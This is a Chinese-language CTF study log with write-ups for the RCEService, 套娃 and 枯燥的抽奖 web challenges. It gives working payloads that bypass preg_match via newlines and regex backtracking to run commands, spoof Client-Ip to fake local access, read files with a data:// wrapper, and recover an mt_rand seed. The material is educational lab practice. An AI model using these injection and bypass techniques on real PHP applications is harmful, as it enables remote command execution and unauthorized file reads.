5月8日学习记录

_[FBCTF2019]RCEService（preg_match函数的绕过）

涉及知识点：preg_match函数绕过，json的格式，正则回溯

打开环境，要求用json的格式输入

搜索学习一下json的语法规则

数组（Array）用方括号(“[]”)表示。
对象（0bject）用大括号(“{}”)表示。
由名称/值对(name/value)，组成数组和对象
并列的数据用","分隔
如{"name":"value","admin":"123"}

到大佬的wp剽个源码过来

<?phpputenv('PATH=/home/rceservice/jail');if (isset($_REQUEST['cmd'])) {$json = $_REQUEST['cmd'];if (!is_string($json)) {echo 'Hacking attempt detected<br/><br/>';} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {echo 'Hacking attempt detected<br/><br/>';} else {echo 'Attempting to run command:<br/>';$cmd = json_decode($json, true)['cmd'];if ($cmd !== NULL) {system($cmd);} else {echo 'Invalid input';}echo '<br/><br/>';}
}?>

浅浅的审计一下代码，参数为cmd，通过cmd传入命令后，进行命令执行，但是对于cmd有是否为json形式和内容有判断，对于json解码只要按照json格式写入就行，对于正则匹配的绕过存在两种方法

方法一

因为preg_match函数只会匹配第一行的内容，所以可以利用换行符来进行绕过

cmd={%0a"cmd":"ls /"%0a}

对于几个根目录，分别查看，在home中能找到flag

cmd={%0A"cmd":"ls /home/rceservice "%0A

这题cat命令不能直接使用，要用/bin/cat调用

cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

方法二

利用正则回溯来绕过正则匹配

简单说就是利用大量的被正则过滤的数据执行，让正则匹配的次数达到有限次的最大值，从而来绕过正则过滤

import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'
res = requests.post("http://c472b751-b7a7-4f0d-b20e-1d9af4d7f233.node5.buuoj.cn:81", data={"cmd":payload})
print(res.text)

[MRCTF2020]套娃

这题主要涉及的还是正则函数的绕过

打开环境

query = $_SERVER['QUERY_STRING'];if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){die('Y0u are So cutE!');
}if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){echo "you are going to the next ~";
}

在第一个if判断中，过滤的"_"和"%5f"

在第二个if判断中，b_u_p_t的值不能为23333，而且正则函数中要求参数的开头和结尾都要是23333

先解决第一个判断中对于"_"和"%5f"的过滤，因为b_u_p_t中带有"_"

关于php中的非法参数名，在php版本小于8时，当变量名中出现空格和点时，会被替换为下划线

比如<input name="a.c">被替换成$_REQUEST["a_c"]

详细的可以参考大佬wp

http://t.csdnimg.cn/4nDYD

所以用b.u.p.t来绕过

至于第二个判断，还是用换行符来绕过,这样匹配到的第一行就只有23333，头尾都是23333

b.u.p.t=23333%0a

访问新页面，新页面中明确表示flag就在这里，但是没有权限，要本地访问

这里我的第一反应是用X-Forwarded-For

但是用了以后还是显示没有权限

用了第二种方法：Client-Ip:127.0.0.1

抓包，改ip

ok，成功修改为本地，而且还有一串js代码，用在线工具跑一下

post传入一个Merak参数，拿到一串源码

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';if(isset($_POST['Merak'])){ highlight_file(__FILE__); die(); 
} function change($v){ $v = base64_decode($v); $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) + $i*2 ); } return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

审计之后，大致能知道flag大概率在flag.php中，通过file_get_contents读取，但是存在一个change方法，把$v的ACill值+$i*2, 要保证$v的值不被改变，只要反向一下change方法就行

<?php
$v="flag.php";
$re='';
for($i=0;$i<strlen($v);$i++)
{$re.=chr(ord($v[$i])-$i*2);
}
$v1=base64_encode($re);
echo $v1;
?>

除此外，还要满足传入2333参数中存在文件内容为 "todat is a happy day",用data伪协议

?2333=data://text/plain,todat is a happy day&file=ZmpdYSZmXGI=

传参后抓包修改为本地

[GWCTF 2019]枯燥的抽奖（伪随机数）

给出一部分字符串，需要猜出20位的字符串

访问一下check.php看看

 <?php
#这不是抽奖程序的源代码！不许看！
header("Content-Type: text/html;charset=utf-8");
session_start();
if(!isset($_SESSION['seed'])){
$_SESSION['seed']=rand(0,999999999);
}mt_srand($_SESSION['seed']);
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){$str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       
}
$str_show = substr($str, 0, 10);
echo "<p id='p1'>".$str_show."</p>";if(isset($_POST['num'])){if($_POST['num']===$str){echo "<p id=flag>抽奖，就是那么枯燥且无味，给你flag{xxxxxxxxx}</p>";}else{echo "<p id=flag>没抽中哦，再试试吧</p>";}
}
show_source("check.php");

可以看到字符串是通过mt_srand生成的

mt_srand是一种伪随机数生成算法，是根据种子来生成数的

一个种子对应的一组随机数，而一组随机数也对应一个种子

所以在知道种子的情况下可以求随机数，在知道随机数的情况下可以求种子

题目已知部分随机数，先求出种子

str1='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2='iypUqMtJZQ'
str3 = str1[::-1]
length = len(str2)
res=''
for i in range(len(str2)):  for j in range(len(str1)):if str2[i] == str1[j]:res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' 'break
print(res)

跑出php_mt_seed的参数，用php_mt_seed工具运行拿到种子

time ./php_mt_seed 8 8 0 61 24 24 0 61 15 15 0 61 56 56 0 61 16 16 0 61 48 48 0 61 19 19 0 61 45 45 0 61 61 61 0 61 52 52 0 61

种子：532696084

<?php
mt_srand(532696084);
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){$str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       
}
echo $str;
?>